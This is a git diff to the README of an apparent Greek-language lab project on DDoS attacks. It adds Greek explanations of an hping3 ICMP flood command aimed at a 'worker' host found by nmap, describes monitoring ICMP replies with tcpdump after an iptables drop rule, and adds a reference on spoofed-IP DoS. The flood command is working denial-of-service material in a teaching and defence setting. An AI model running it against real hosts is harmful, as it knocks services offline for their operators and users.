diff --git a/1. DDos Attack/README.md b/1. DDos Attack/README.md index 02d54c3..570c826 100644 --- a/1. DDos Attack/README.md +++ b/1. DDos Attack/README.md @@ -25,7 +25,7 @@ _____________________________________________________________ **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** -* Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση. +* Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση. Χρησιμοποιώντας τη –flood στέλνονται τα πακέτα όσο το δυνατόν γρηγορότερα και δεν θα εμφανίζει τις απαντήσεις. **sudo hping3 -p 80 --flood --icmp $worker** ______________________________________________ @@ -66,7 +66,7 @@ ___________________________________________________ **sudo iptables -A icmp_flood -j DROP** -* +* Επιβλέπουμε για 5" τα ICMP replies προς τον master. Παρατηρώντας πόσο αλλάζει το μέγεθος των ICMP πακέτων ανά το διαφορετικό χρονικό όριο, βγάζουμε και τα αντίστοιχα συμπεράσματα. **sudo timeout 5s tcpdump -i eth0 icmp and src $my_ip** @@ -75,5 +75,6 @@ ______________________________________________________ **References** 1. http://www.ijens.org/Vol_12_I_03/1210803-7474-IJET-IJENS.pdf 2. https://www.infosectrain.com/blog/dos-ddos-attacks/ +3. https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/